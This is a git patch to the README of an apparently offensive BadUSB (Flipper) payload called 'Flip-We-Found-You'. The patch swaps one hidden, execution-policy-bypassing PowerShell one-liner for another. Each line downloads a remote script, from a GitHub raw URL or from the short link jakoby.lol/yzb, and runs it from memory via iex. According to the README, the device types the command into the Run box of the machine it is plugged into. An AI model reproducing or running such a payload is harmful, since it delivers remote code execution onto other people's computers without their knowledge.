From 5f75cce7845d993cc0e8c9f27517e8dfc1e96c71 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 17:01:59 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-We-Found-You/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-We-Found-You/README.md b/Payloads/Flip-We-Found-You/README.md index 9b5bfd0..ad055fd 100644 --- a/Payloads/Flip-We-Found-You/README.md +++ b/Payloads/Flip-We-Found-You/README.md @@ -40,7 +40,7 @@ And sapi speak with talk through their speakers the message provided or a custom * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/wefoundyou.ps1 | iex +powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/yzb | iex ```

(back to top)